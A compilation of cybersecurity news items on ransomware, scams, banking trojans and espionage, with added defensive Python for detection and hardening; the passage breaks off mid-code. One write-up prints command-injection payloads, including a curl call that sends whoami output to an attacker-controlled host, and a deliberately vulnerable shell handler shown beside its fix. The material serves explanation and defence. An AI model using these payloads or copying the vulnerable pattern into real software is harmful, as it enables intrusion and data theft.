“They're Just People—But Dangerous Ones”: Trellix's John Fokker Unpacks the Blurred Battlefield of Cybercrime at RSA 2025

At the RSA Conference 2025, John Fokker, head of threat intelligence at the Trellix Advanced Research Center, issued a stark reminder to the cybersecurity community: behind every cyberattack is a human being, and the boundaries between criminals and nation-states are rapidly dissolving. Drawing on his experience as a former officer in the Dutch high-tech crime unit, Fokker urged cybersecurity professionals to stop viewing threats as faceless or purely technical. “Cybercriminals are not abstract concepts,” he said. “They’re individuals—ordinary people who happen to be doing bad things behind a keyboard.” 

His keynote speech stressed the importance of not overlooking basic vulnerabilities in the rush to guard against sophisticated attacks. “Attackers still go for the low-hanging fruit—weak passwords, missing patches, and lack of multi-factor authentication,” he noted. A central theme of his address was the convergence of criminal networks and state-backed operations. “What once were clearly separated entities—financially motivated hackers and state actors...are now intertwined,” Fokker said. “Nation-states are increasingly using proxies or outright criminals to carry out espionage and disruption campaigns.” Fokker illustrated this through a case study involving the notorious Black Basta ransomware group. 

He referenced internal communications that surfaced in an investigation, revealing that the group’s leader, “Oleg”, was formerly known as “Tramp” in the Conti gang. Oleg was reportedly arrested on arriving in Armenia from Moscow last year, but escaped custody just days later. According to the leaked chats, he claimed Russian officials orchestrated his return through a so-called “green corridor,” allegedly coordinated by a senior government figure referred to as “number one.” While Fokker clarified that these claims remain unverified, he emphasized that they are a troubling sign of potential collaboration between state entities and criminal gangs. 

Still, he reminded attendees that attackers are not infallible. He recounted a failed ransomware attack by Black Basta on a U.S. healthcare organization, where the group’s encryption tool malfunctioned. “They had to fall back on threatening to leak data when the original extortion method broke down,” Fokker explained, highlighting that even seasoned attackers are prone to critical errors.

Security Researcher Uncovers Critical RCE Flaw in API Due to Incomplete Input Validation

In a recent security evaluation, a researcher discovered a severe remote code execution (RCE) vulnerability caused by improper backend input validation and misplaced reliance on frontend filters. The vulnerability centered on a username field within a target web application. 

On the surface, this field appeared to be protected by a regular expression filter—/^[a-zA-Z0-9]{1,20}$/—which was designed to accept only alphanumeric usernames up to 20 characters long. However, this filtering was enforced exclusively on the frontend via JavaScript. While this setup may prevent casual misuse through the user interface, it offered no protection once the client-side constraints were bypassed. 

The server did not replicate or enforce these restrictions, creating an opportunity for attackers to supply crafted payloads directly to the backend. 

Client-Side Regex: A False Sense of Security

The researcher quickly identified a dangerous assumption built into the application’s architecture: that client-side validation would be sufficient to sanitize input. This assumption led the backend to trust incoming data without question. 

By circumventing the web interface and manually crafting HTTP requests, the researcher was able to supply input that the frontend regex would have blocked. This demonstrated a critical weakness in the security design. The researcher noted that client-side regular expressions should be viewed as tools for guiding input formatting, not as security mechanisms: a check that runs only in the user’s browser is a check the attacker controls. 

When frontend validation is treated as a safeguard rather than a convenience, it opens the door to serious vulnerabilities. 

Bypassing Protections via Alternate HTTP Methods

The most significant discovery came when the researcher explored alternate HTTP methods. The web interface submitted the username via POST requests, the only path the client-side regex ever covered, but the backend also accepted PUT requests at the same endpoint. These PUT requests were not subjected to any validation, server-side or otherwise, creating a dangerous inconsistency. 

Using a crafted PUT request with the payload username=;id;, the researcher confirmed the ability to inject and execute arbitrary commands: the server’s response contained the output of id, showing that the field was being handed to a shell and that the injected command had run. Further probing revealed the potential for more advanced attacks, including out-of-band (OOB) data exfiltration. 

By submitting a payload like username=;curl http://attacker-controlled.com/$(whoami);, the researcher caused the server to initiate a connection to an external domain, with the result of whoami embedded in the requested path. This revealed the account the server process was running as and proved command execution in a way that does not depend on the HTTP response echoing any output, which is what makes OOB techniques useful against blind injection. The absence of a web application firewall (WAF) allowed this traffic to pass unnoticed, making the attack both silent and effective. 

Architectural Oversight and Security Best Practices

This case highlights a widespread architectural flaw: the fragmentation of security logic between frontend and backend layers. Developers frequently assume that if an input field is restricted on the client side, it is secure, overlooking the need to apply the same or stricter rules on the server. This disconnect is what enabled the exploit. 

The API processed data without verifying that it adhered to the expected format, and alternative HTTP methods were neither restricted nor monitored. To address such risks, server-side validation must be the primary line of defense: every piece of input should be checked against an allowlist of acceptable values before processing, on every HTTP method the endpoint accepts, and methods the application does not need should be rejected outright. 

Additionally, output should be encoded for the context in which it is used, so that even if unsafe input slips through it cannot be interpreted as code, and input that must reach a shell or other interpreter should be passed as discrete arguments rather than interpolated into a command string. Logging and monitoring are also critical, especially for API endpoints that might be vulnerable to tampering, and outbound egress filtering on application servers would have stopped the callback to the attacker’s domain. A robust WAF could have detected and blocked these unusual request patterns, such as command injection or OOB callbacks, mitigating the threat before damage occurred.
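
As an added illustration (not code from the write-up, whose backend stack is never named), the following Python reconstructs the flaw and its fix. It assumes a backend that builds a shell command from the username field, the simplest explanation for ;id; executing; the lookup command, the handler names and the suspicious_request heuristic are all hypothetical.

```python
import re
import subprocess

# The allowlist from the write-up, now compiled on the server side.
USERNAME_RE = re.compile(r"^[a-zA-Z0-9]{1,20}$")


def vulnerable_handler(method: str, username: str) -> str:
    """Assumed reconstruction of the flawed backend (not the real application).

    Only the POST path re-checks the regex; PUT reaches the shell untouched, and the
    username is interpolated into a command string, so ';' starts a second command.
    """
    if method == "POST" and not USERNAME_RE.match(username):
        return "rejected"
    cmd = f"echo user={username}"  # hypothetical lookup command built from user input
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def no_shell_lookup(username: str) -> str:
    """The same lookup with an argv list: the username is one argument, never shell-parsed,
    so ';echo INJECTED;' is printed literally rather than executed."""
    out = subprocess.run(["echo", f"user={username}"], capture_output=True, text=True)
    return out.stdout


def hardened_handler(method: str, username: str) -> str:
    """Server-side allowlist on the only accepted method, no shell, other methods refused."""
    if method != "POST":
        return "method not allowed"
    # fullmatch rather than match(): with match(), the trailing '$' still accepts
    # 'alice' followed by a newline, which a browser form would never have produced.
    if not USERNAME_RE.fullmatch(username):
        return "rejected"
    return no_shell_lookup(username)


def suspicious_request(method: str, params: dict) -> bool:
    """Log-review heuristic for this endpoint: an unexpected method, or any character
    outside the allowlist in a field that should be purely alphanumeric."""
    if method != "POST":
        return True
    return re.search(r"[^a-zA-Z0-9]", params.get("username", "")) is not None


if __name__ == "__main__":
    print(repr(vulnerable_handler("PUT", ";echo INJECTED;")))   # second command runs
    print(repr(no_shell_lookup(";echo INJECTED;")))            # printed literally
    print(repr(hardened_handler("PUT", ";echo INJECTED;")))    # method not allowed
    print(repr(hardened_handler("POST", "alice")))
```

Running the module shows the PUT path executing the injected command while the hardened path refuses both the method and the payload. The no_shell_lookup call demonstrates that passing input as an argv element neutralises shell metacharacters even before validation is considered, which is why the two defences belong together rather than as alternatives.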

Bitdefender Warns of Surge in Subscription Scams Disguised as Online Stores and Mystery Boxes

Cybersecurity researchers at Bitdefender have uncovered a sharp increase in deceptive online subscription scams, with fraudsters disguising themselves as legitimate e-commerce platforms and mystery box vendors. These sophisticated schemes are luring unsuspecting users into handing over sensitive credit card details under the guise of low-cost purchases. 

Unlike older, more obvious fraud attempts, this new wave of scams involves meticulously crafted fake websites that mimic real online shops. Bitdefender’s investigation revealed over 200 fraudulent sites offering goods such as footwear, apparel, and electronic gadgets. 

The catch? Victims unknowingly agree to recurring subscription charges cleverly hidden in the fine print. One tactic gaining traction is the so-called “mystery box” scam. These scams entice consumers with a small upfront fee in exchange for a surprise package, often marketed as unclaimed luggage or packages left behind at airports or post offices. 
However, the real goal is to harvest personal and payment information, often enrolling victims in recurring payment plans before the transaction is even finalized. The scams are widely advertised on social media platforms, including Facebook, through sponsored posts. 

In many cases, scammers pose as content creators or use fake influencer pages to build trust. Bitdefender researchers found more than 140 websites pushing these scams, with many traced back to a recurring address in Limassol, Cyprus—an address also linked to entities named in the Paradise Papers by the ICIJ Offshore Leaks Database. 

Some websites go further, advertising discounted “member prices” that require account top-ups, like a charge of €44 every two weeks, often concealed in promotional offers. These scams frequently promote multiple membership levels, using store credits and promises of steep discounts to mask overpriced or outdated products. 

Bitdefender warns that the evolving nature of these scams—complete with high-quality websites, paid advertising, and fake brand endorsements—makes them harder to detect. With the profitability of subscription fraud rising, scammers are scaling their operations, expanding beyond mystery boxes into bogus product sales and investment offers. 

Researchers caution users to stay vigilant while shopping online, especially when prompted to enter payment information for deals that seem too good to be true. As these tactics grow more elaborate, consumers are urged to read the fine print and verify the authenticity of online shops before completing any transactions.

Massive 1Tbps DDoS Attack Cripples Online Betting Site, Exposes Industry’s Ongoing Cybersecurity Failures

An online betting company has been knocked offline by a colossal 1-terabit-per-second Distributed Denial of Service (DDoS) attack, exposing glaring weaknesses in the digital defences of the gambling industry. Reported by TechRadar, the attack unleashed a massive flood of junk traffic that overwhelmed the site’s infrastructure, rendering its services inaccessible for hours. 

What makes the incident more concerning is the lack of sophistication behind it—this wasn’t a complex, stealthy operation but rather a brute-force flood that succeeded purely through scale. Despite the growing prevalence of such attacks in recent years, many companies in high-risk sectors like online gambling continue to treat cybersecurity as an afterthought. 

With their operations heavily reliant on constant uptime and revenue tied to every second online, gambling platforms remain prime targets for attackers, yet many fail to invest in fundamental protections like cloud-based DDoS mitigation, real-time monitoring, and incident response planning. 

Cybersecurity experts are baffled by this ongoing negligence, especially when previous headline-grabbing attacks—such as the 1.3Tbps assault on GitHub in 2018 or AWS’s 2.3Tbps encounter in 2020—should have prompted serious change. 

Compounding the issue is the role of Internet Service Providers (ISPs), who continue to shy away from proactive upstream filtering, allowing these massive data floods to reach their targets unchecked. The financial impact of such downtime is severe, with potential losses not only in revenue but also in user trust, legal exposure, and long-term brand damage. 

Security professionals stress that effective DDoS defence requires more than just faith in hosting providers; it demands deliberate investment in scalable protection tools like AWS Shield, Cloudflare, or Akamai, along with robust infrastructure redundancy and tested incident response strategies. 

In 2025, DDoS attacks are no longer anomalies—they’re a constant threat woven into the fabric of the internet. Ignoring them is not cost-saving; it’s gambling with disaster.

DragonForce Unveils Cartel-Style Ransomware Model to Attract Affiliates

The ransomware landscape is seeing a shift as DragonForce, a known threat actor, introduces a new business model designed to bring various ransomware groups under a single, cartel-like umbrella. This initiative is aimed at simplifying operations for affiliates while expanding DragonForce’s reach in the cybercrime ecosystem. 

Traditionally, ransomware-as-a-service (RaaS) operations involve developers supplying the malicious tools and infrastructure, while affiliates carry out attacks and manage ransom negotiations. In exchange, developers typically receive up to 30% of the ransom collected. DragonForce’s updated model deviates from this approach by functioning more like a platform-as-a-service, offering its tools and infrastructure for a smaller cut—just 20%. 

Under this new setup, affiliates are allowed to create and operate under their own ransomware brand, all while utilizing DragonForce’s backend systems. These include data storage for exfiltrated files, tools for ransom negotiations, and malware deployment systems. This white-label model allows groups to appear as independent operations while relying on DragonForce’s infrastructure. 

A spokesperson for DragonForce told BleepingComputer that the group operates with clear rules and standards, which all affiliates are expected to follow. Any violations, they say, result in immediate removal from the network. Though these rules aren’t publicly disclosed, the group claims to maintain control since all services run on its servers. 

Interestingly, DragonForce claims it avoids certain targets in the healthcare sector, specifically facilities treating cancer and heart conditions. The group insists its motives are purely financial and not intended to harm vulnerable individuals. Cybersecurity analysts at Secureworks have noted that this new structure could appeal to both inexperienced and seasoned attackers. 

The simplified access to powerful ransomware tools, without the burden of managing infrastructure, lowers the barrier to entry and could lead to a broader adoption among cybercriminals. DragonForce has indicated its platform is open to unlimited affiliate brands capable of targeting a range of systems, including ESXi, NAS, BSD, and Windows environments. 

While the number of affiliates joining the network remains undisclosed, the group claims to have received interest from several prominent ransomware outfits. One such group, RansomBay, is already reported to be participating in the model. As this cartel-style operation gains traction, it could signal a new phase in ransomware operations—where brand diversity masks a centralised, shared infrastructure designed for profit and scalability.

Payment Fraud on the Rise: How Businesses Are Fighting Back with AI

The threat of payment fraud is growing rapidly, fueled by the widespread use of digital transactions and evolving cyber tactics. At its core, payment fraud refers to the unauthorized use of someone’s financial information to make illicit transactions. Criminals are increasingly leveraging hardware tools like skimmers and keystroke loggers, as well as malware, to extract sensitive data during legitimate transactions. 

As a result, companies are under mounting pressure to adopt more advanced fraud prevention systems. Credit and debit card fraud continue to dominate fraud cases globally. The Nilson Report found that global losses due to payment card fraud reached $33.83 billion in 2023, with nearly half of these losses affecting U.S. cardholders. 

While chip-enabled cards have reduced in-person fraud, online or card-not-present (CNP) fraud has surged. Debit card fraud often results in immediate financial damage to the victim, given its direct link to bank accounts. Meanwhile, mobile payments are vulnerable to tactics like SIM swapping and mobile malware, allowing attackers to hijack user accounts. 

Other methods include wire fraud, identity theft, chargeback fraud, and even check fraud—which, despite a decline in paper check usage, remains a threat through forged or altered checks. In one recent case, customers manipulated ATM systems to deposit fake checks and withdraw funds before detection, resulting in substantial bank losses. Additionally, criminals have turned to synthetic identity creation and AI-generated impersonations to carry out sophisticated schemes.  

However, artificial intelligence is not just a tool for fraudsters—it’s also a powerful ally for defense. Financial institutions are integrating AI into their fraud detection systems. Platforms like Visa Advanced Authorization and Mastercard Decision Intelligence use real-time analytics and machine learning to assess transaction risk and flag suspicious behavior. 

AI-driven firms such as Signifyd and Riskified help businesses prevent fraud by analyzing user behavior, transaction patterns, and device data. The consequences of payment fraud extend beyond financial loss. Businesses also suffer reputational harm, resource strain, and operational disruptions. 

With nearly 60% of companies reporting fraud-related losses exceeding $5 million in 2024, preventive action is crucial. From employee training and risk assessments to AI-powered tools and multi-layered security, organizations are now investing in proactive strategies to protect themselves and their customers from the rising tide of digital fraud.

Smishing Surge Expected in 2025 Driven by Sophisticated Phishing-as-a-Service Platform

Security researchers are sounding the alarm on a looming global wave of smishing attacks, warning that a powerful phishing-as-a-service (PhaaS) platform named Lucid—run by Chinese-speaking threat actors—is enabling cybercriminals to scale operations across 88 countries. 

According to threat intelligence firm Catalyst, Lucid has evolved from local-level operations into a globally disruptive tool, with a sharp increase in activity anticipated by early 2025. The platform allows attackers to send malicious links via Apple iMessage and Android’s Rich Communication Services, bypassing traditional telecom network filters. It also features a credit card validator, helping criminals confirm stolen financial information in real time. 

Lucid’s architecture offers an automated, subscription-based model that supports customizable phishing campaigns, leveraging anti-detection strategies like IP blocking, user-agent filtering, and time-limited URLs to avoid scrutiny. Threat actors using Lucid are increasingly impersonating trusted entities—such as government agencies, postal services, and toll collection services—to deceive victims and steal sensitive data. 

The U.S. has been hit particularly hard, with smishing scams prompting alerts from the FBI, FTC, state governments, and attorneys general. What sets Lucid apart is its efficiency and scale: researchers say it can send over 100,000 phishing messages per day. Its structure includes roles ranging from administrators to guest users, with weekly licensing options and automatic suspensions for non-renewal. 

These campaigns are notably effective, with a reported success rate of 5%. By operating over the internet and using device fingerprinting and geo-targeted phishing pages, Lucid boosts its reach while staying under the radar. 

It sources phone numbers through data breaches, OSINT, and darknet markets, making it one of the most sophisticated PhaaS platforms today—alongside others like Darcula and Lighthouse. As cybercriminals continue to embrace this plug-and-play model, experts fear smishing will become an even more pervasive threat in the months ahead.

New Android Banking Trojan 'Crocodilus' Emerges as Sophisticated Threat in Spain and Turkey

A newly identified Android banking malware named Crocodilus is making waves in the cybersecurity world, with experts warning about its advanced capabilities and targeted attacks in Spain and Turkey. Discovered by Dutch mobile security firm ThreatFabric, the malware represents a major leap in sophistication, emerging not as a prototype but as a fully-developed threat capable of device takeover, remote control, and stealth data harvesting through accessibility services. 

Unlike many early-stage banking trojans, Crocodilus comes armed with a broad range of functionalities from its inception. Masquerading as Google Chrome via a misleading package name ("quizzical.washbowl.calamity"), the malware bypasses Android 13+ restrictions and initiates its attack by requesting accessibility permissions. Once granted, it connects to a command-and-control (C2) server to receive a list of targeted financial applications and corresponding HTML overlays to steal login credentials. 

The malware also targets cryptocurrency users with a unique social engineering strategy. Instead of spoofing wallet login pages, it pushes alarming messages urging users to back up their seed phrases within 12 hours or risk losing access. This manipulative tactic prompts victims to expose their seed phrases, which are then harvested via accessibility logging—giving attackers full access to the wallets. 

Crocodilus operates continuously in the background, monitoring app launches, capturing screen elements, and even intercepting one-time passwords from apps like Google Authenticator. It conceals its malicious activity by muting sounds and deploying a black screen overlay to keep users unaware. Key features include launching apps, removing itself from devices, sending SMS messages, retrieving contacts, requesting device admin rights, enabling keylogging, and modifying SMS management privileges. The malware’s ability to dynamically update C2 server settings further enhances its adaptability. 

ThreatFabric notes that the malware’s sophistication, especially in its initial version, suggests a seasoned developer behind its creation—likely Turkish-speaking, based on code analysis. The emergence of Crocodilus underscores the evolving threat landscape of mobile banking malware, where adversaries are deploying complex and evasive techniques earlier in development cycles. In a related development, Forcepoint reported a separate phishing campaign using tax-themed emails to spread the Grandoreiro banking trojan in Latin America and Spain, indicating a broader uptick in banking malware activity across platforms and regions.
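
For anyone triaging a handset, the package name above and the accessibility grant the malware depends on are both visible through adb. The Python below is an added example, not ThreatFabric tooling: it parses the output of `adb shell pm list packages` and `adb shell settings get secure enabled_accessibility_services` (captured separately and passed in as text) and flags the known package plus any accessibility service held by a package outside an assumed allowlist. The sample outputs, the service class name and the allowlist contents are constructed.

```python
# Indicator quoted in the ThreatFabric write-up above (the package name the malware installs under).
KNOWN_BAD_PACKAGES = {"quizzical.washbowl.calamity"}

# Assumed allowlist of packages that legitimately hold an accessibility service on your fleet.
ALLOWED_ACCESSIBILITY_PACKAGES = {"com.google.android.marvin.talkback"}


def parse_package_list(pm_output: str) -> set:
    """Parse the output of `adb shell pm list packages` (one 'package:<name>' per line)."""
    packages = set()
    for line in pm_output.splitlines():
        line = line.strip()
        if line.startswith("package:"):
            packages.add(line[len("package:"):])
    return packages


def parse_accessibility_services(settings_output: str) -> set:
    """Parse `adb shell settings get secure enabled_accessibility_services`.

    The value is a colon-separated list of 'package/ServiceClass' entries, or 'null'
    when nothing is enabled. Only the package half matters for triage.
    """
    value = settings_output.strip()
    if not value or value == "null":
        return set()
    return {entry.split("/", 1)[0] for entry in value.split(":") if entry}


def triage(pm_output: str, settings_output: str) -> list:
    """Return findings: known-bad packages, and accessibility grants to unexpected packages."""
    installed = parse_package_list(pm_output)
    a11y = parse_accessibility_services(settings_output)
    findings = []
    for pkg in sorted(installed & KNOWN_BAD_PACKAGES):
        findings.append(("known_bad_package", pkg))
    for pkg in sorted(a11y - ALLOWED_ACCESSIBILITY_PACKAGES):
        findings.append(("unexpected_accessibility_service", pkg))
    return findings


# Constructed sample output (not captured from a real device); the service class name is made up.
SAMPLE_PM = """\
package:com.android.chrome
package:com.google.android.marvin.talkback
package:quizzical.washbowl.calamity
package:com.example.bank
"""
SAMPLE_A11Y = (
    "com.google.android.marvin.talkback/com.google.android.marvin.talkback.TalkBackService:"
    "quizzical.washbowl.calamity/.svc.AccessService"
)

if __name__ == "__main__":
    for finding in triage(SAMPLE_PM, SAMPLE_A11Y):
        print(*finding)
```

The second rule is the more durable one: a package name is trivial for the operators to rotate, whereas a banking trojan built on accessibility logging cannot function without that grant, so an unexpected entry in enabled_accessibility_services is worth investigating regardless of what the package calls itself.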

Cyber Threats Surge Across Africa’s Financial Sector, Urging Stronger Cybersecurity Defenses

In 2024, the financial landscape in Africa has been rocked by a series of high-impact cyberattacks, underscoring the urgent need for enhanced digital defenses across the Banking, Financial Services, and Insurance (BFSI) sector. From Uganda to Zimbabwe and South Africa, institutions are increasingly in the crosshairs of sophisticated cybercriminal groups. One of the most alarming incidents involved the Bank of Uganda, which reportedly lost approximately $16.8 million to an offshore hacking group known as “Waste.” 

In another incident, ZB Financial Holdings in Zimbabwe suffered a ransomware attack in July that led to substantial data exposure, compromising both customer details and operational systems. South Africa’s Standard Bank also confirmed a recent data breach that affected limited personal and financial data, highlighting how widespread and varied these threats have become. Interpol’s 2024 African Cyberthreat Assessment paints a grim picture—cyberattacks on African businesses surged by 23% in 2023, with ransomware and data breaches being the most prevalent. 

These figures reflect not only a rising frequency but also the growing sophistication of cybercrime on the continent. The IBM 2024 Cost of a Data Breach report further reveals that the average cost of a data breach in South Africa has risen sharply to R53.1 million, a significant jump from R49.45 million the previous year. Historical incidents continue to serve as cautionary tales. The 2020 Experian breach compromised 24 million personal records, while the 2023 Medusa ransomware attack on the Bank of Africa’s Malian unit resulted in the leak of 2TB of sensitive data. 

These events demonstrate the severe financial and reputational risks African financial institutions face. As the sector increasingly adopts technologies such as artificial intelligence, blockchain, and cloud computing, new avenues for cyber exploitation have emerged. Threats like phishing schemes, insider sabotage, and regulatory compliance issues now loom larger than ever before. “Cybercrime is evolving at an alarming rate, and financial institutions in Africa are prime targets,” said Abe Wakama, CEO of IT News Africa. 

“The BFSI Security Summit will offer a vital platform for industry leaders to collaborate, exchange knowledge, and deploy effective strategies to protect their institutions,” he further added. 

Cybersecurity experts and Chief Information Security Officers (CISOs) across the continent are responding by urging a multi-layered approach to digital defense—deploying AI-powered threat detection systems, implementing zero trust security models, and ensuring compliance with key data privacy regulations like South Africa’s Protection of Personal Information Act (POPIA) and the EU’s GDPR. Additional measures such as continuous monitoring, advanced endpoint protection, and robust incident response planning are becoming standard practice. Equally critical are human factors—regular employee training and rigorous penetration testing play a pivotal role in building organizational cyber resilience.

Netflix Users Warned About AI-Powered Phishing Scam

Netflix subscribers are being warned about a sophisticated phishing scam circulating via email, designed to steal personal and financial information. 

The deceptive email mimics an official Netflix communication, falsely claiming that the recipient’s account has been put on hold. It urges users to click a link to resolve the issue, which redirects them to a fraudulent login page that closely resembles Netflix’s official site. 

Unsuspecting users are then prompted to enter sensitive details, including their Netflix credentials, home address, and payment information. Cybersecurity experts caution that phishing scams have become more advanced with the rise of AI-driven tactics. 

According to Jake Moore, Global Cybersecurity Advisor at ESET, artificial intelligence has enabled cybercriminals to launch phishing campaigns at an unprecedented scale, making them appear more legitimate while targeting a larger number of users. 

“Despite these advancements, many scams still rely on urgency to pressure recipients into acting quickly without verifying the sender’s authenticity,” Moore explained. 

Users are advised to remain vigilant, double-check email sources, and avoid clicking on suspicious links. Instead, they should visit Netflix directly through its official website or app to verify any account-related issues.

Cisco Talos Uncovers Lotus Blossom’s Multi-Campaign Cyber Espionage Operations

Cisco Talos has uncovered a series of cyber espionage campaigns attributed to the advanced persistent threat (APT) group Lotus Blossom, also known as Spring Dragon, Billbug, and Thrip. 

The group has been active since at least 2012, targeting government, manufacturing, telecommunications, and media sectors in regions such as the Philippines, Vietnam, Hong Kong, and Taiwan. Talos identified Sagerunex, a backdoor tool used exclusively by Lotus Blossom, as the core malware in these campaigns. 

The investigation revealed multiple variants of Sagerunex, evolving from its original form to leverage third-party cloud services such as Dropbox, Twitter, and Zimbra webmail as command-and-control (C2) tunnels, instead of traditional Virtual Private Servers (VPS). This shift helps the group evade detection while maintaining control over infected endpoints. 

The group has been observed gaining persistence on compromised systems by embedding Sagerunex into the system registry and configuring it to run as a service. The malware operates as a dynamic link library (DLL), executed directly in memory to avoid detection. The campaigns also showcase long-term persistence strategies, allowing attackers to remain undetected for months. 

Beyond Sagerunex, Lotus Blossom employs an arsenal of hacking tools to facilitate credential theft, privilege escalation, and data exfiltration. These include a Chrome cookie stealer from GitHub, a customized Venom proxy tool, a privilege adjustment tool, and an archiving tool for encrypting and stealing data. 

Additionally, the group utilizes mtrain V1.01, a modified HTran proxy relay tool, to route connections between compromised machines and external networks. The attack chain follows a structured multi-stage approach, starting with reconnaissance commands such as “net,” “tasklist,” “ipconfig,” and “netstat” to gather system details. 

If an infected machine lacks direct internet access, the attackers leverage proxy settings or the Venom tool to establish connectivity. A notable tactic involves storing malicious tools in the “public\pictures” subfolder, a non-restricted directory, to avoid detection.
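
The reconnaissance sequence and the public\pictures staging folder are both things a defender can look for in process-creation telemetry. The following Python is an added example, not Talos tooling: it runs over constructed records in a simple pipe-delimited form that mimics Sysmon Event ID 1 fields (timestamp, host, parent PID, image path, command line), so the field layout, host names, PIDs and the mtrain.exe file name are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta
import ntpath

# The reconnaissance binaries named in the Talos write-up, and the staging folder it cites.
RECON_TOOLS = {"net.exe", "tasklist.exe", "ipconfig.exe", "netstat.exe"}
STAGING_DIR = r"c:\users\public\pictures"


def parse_event(line: str) -> dict:
    """Parse one constructed process-creation record: ts|host|parent_pid|image|cmdline."""
    ts, host, ppid, image, cmdline = line.split("|", 4)
    return {"ts": datetime.fromisoformat(ts), "host": host, "ppid": int(ppid),
            "image": image, "cmdline": cmdline}


def detect(lines, window=timedelta(seconds=60), threshold=3) -> list:
    """Two rules over process-creation events.

    1. Any executable launched from the Public\\Pictures staging folder.
    2. At least `threshold` distinct recon tools spawned by the same parent on the
       same host inside `window` (one alert per parent).
    """
    events = [parse_event(line) for line in lines if line.strip()]
    alerts = []
    for e in events:
        if e["image"].lower().startswith(STAGING_DIR):
            alerts.append(("staging_dir_exec", e["host"], e["image"]))
    by_parent = defaultdict(list)
    for e in events:
        name = ntpath.basename(e["image"]).lower()
        if name in RECON_TOOLS:
            by_parent[(e["host"], e["ppid"])].append((e["ts"], name))
    for (host, ppid), seq in by_parent.items():
        seq.sort()
        for i, (t0, _) in enumerate(seq):
            tools = {n for t, n in seq[i:] if t - t0 <= window}
            if len(tools) >= threshold:
                alerts.append(("recon_burst", host, ppid, tuple(sorted(tools))))
                break
    return alerts


# Constructed sample records (not real telemetry); fields mimic Sysmon Event ID 1.
SAMPLE_LOG = r"""
2025-03-01T10:00:01|WS01|4120|C:\Windows\System32\net.exe|net user
2025-03-01T10:00:05|WS01|4120|C:\Windows\System32\tasklist.exe|tasklist /v
2025-03-01T10:00:09|WS01|4120|C:\Windows\System32\ipconfig.exe|ipconfig /all
2025-03-01T10:00:12|WS01|4120|C:\Windows\System32\NETSTAT.EXE|netstat -ano
2025-03-01T10:03:40|WS01|4120|C:\Users\Public\Pictures\mtrain.exe|mtrain.exe
2025-03-01T11:15:00|WS02|880|C:\Windows\System32\ipconfig.exe|ipconfig
"""

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG.splitlines()):
        print(*alert)
```

On the sample, WS01 produces both alerts (four distinct recon tools from one parent within eleven seconds, then an executable started from the staging folder) while WS02's lone ipconfig stays quiet. The window and threshold are the tuning knobs: administrators do run these commands, but rarely all of them from one parent in under a minute.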

Talos’ research underscores the growing sophistication of Lotus Blossom, which continues to refine its techniques and expand its capabilities. With high confidence, Cisco attributes these campaigns to Lotus Blossom, highlighting its sustained cyber espionage operations against high-value targets.

Lending App Data Breach Leaves Sensitive Customer Information Unprotected

A major digital lending platform has reportedly exposed sensitive customer data through a misconfigured Amazon S3 bucket that was left publicly accessible without authentication. Security researchers discovered the exposure on November 28, 2024, but the issue remained unresolved until January 16, 2025, leaving the data accessible for over a month. While there is no direct evidence that cybercriminals accessed the information, experts warn that only a thorough forensic audit, in this case of the bucket’s server access logs if they were enabled, could confirm whether any unauthorized access took place.  
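
The misconfiguration described here, a bucket readable without authentication, is detectable from three API responses before any data leaks. The Python below is an added example, not the platform’s or the researchers’ code: it evaluates the JSON shapes returned by `aws s3api get-bucket-acl`, `get-bucket-policy` (its Policy string parsed with json.loads) and `get-public-access-block`, flagging grants to the AllUsers and AuthenticatedUsers groups, Allow statements with Principal "*", and any Block Public Access flag left off. The bucket name, account ID and role name in the samples are placeholders.

```python
import json

ALL_USERS = "http://acs.amazonaws.com/groups/global/AllUsers"
AUTH_USERS = "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
PAB_FLAGS = ("BlockPublicAcls", "IgnorePublicAcls", "BlockPublicPolicy", "RestrictPublicBuckets")


def acl_public_grants(acl: dict) -> list:
    """Grants to AllUsers/AuthenticatedUsers in a get-bucket-acl response."""
    findings = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        if grantee.get("Type") == "Group" and grantee.get("URI") in (ALL_USERS, AUTH_USERS):
            group = grantee["URI"].rsplit("/", 1)[-1]
            findings.append(f"ACL grants {grant.get('Permission')} to {group}")
    return findings


def _principal_is_public(principal) -> bool:
    """Principal '*' or {'AWS': '*'} (or a list containing '*') means anyone."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        aws = principal.get("AWS")
        return aws == "*" or (isinstance(aws, list) and "*" in aws)
    return False


def policy_public_statements(policy: dict) -> list:
    """Allow statements open to everyone in a parsed bucket policy document."""
    findings = []
    for stmt in policy.get("Statement", []):
        if stmt.get("Effect") != "Allow" or not _principal_is_public(stmt.get("Principal")):
            continue
        actions = stmt.get("Action", [])
        actions = [actions] if isinstance(actions, str) else list(actions)
        sid = stmt.get("Sid", "<no Sid>")
        if "Condition" in stmt:
            # A Condition (e.g. aws:SourceVpce) may narrow this to something acceptable;
            # surface it for review instead of deciding automatically.
            findings.append(f"policy {sid}: Principal * with a Condition, review manually")
        else:
            findings.append(f"policy {sid}: allows {', '.join(actions)} to Principal *")
    return findings


def assess_bucket(acl: dict, policy: dict, public_access_block: dict) -> dict:
    """Combine ACL, policy and Block Public Access settings into one verdict."""
    findings = acl_public_grants(acl) + policy_public_statements(policy)
    missing = [flag for flag in PAB_FLAGS if not (public_access_block or {}).get(flag)]
    if missing:
        findings.append("Block Public Access not fully enabled: " + ", ".join(missing))
    return {"public": bool(findings), "findings": findings}


# Constructed sample documents (placeholder bucket, account and role names) in the shapes
# returned by get-bucket-acl, get-bucket-policy (after json.loads) and get-public-access-block.
LEAKY_ACL = {"Owner": {"ID": "owner-id"},
             "Grants": [{"Grantee": {"Type": "CanonicalUser", "ID": "owner-id"}, "Permission": "FULL_CONTROL"},
                        {"Grantee": {"Type": "Group", "URI": ALL_USERS}, "Permission": "READ"}]}
LEAKY_POLICY = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [{"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
                 "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-kyc-docs/*"}]
}""")
LEAKY_PAB = {flag: False for flag in PAB_FLAGS}

FIXED_ACL = {"Owner": {"ID": "owner-id"},
             "Grants": [{"Grantee": {"Type": "CanonicalUser", "ID": "owner-id"}, "Permission": "FULL_CONTROL"}]}
FIXED_POLICY = {"Version": "2012-10-17", "Statement": [
    {"Sid": "AppRoleOnly", "Effect": "Allow",
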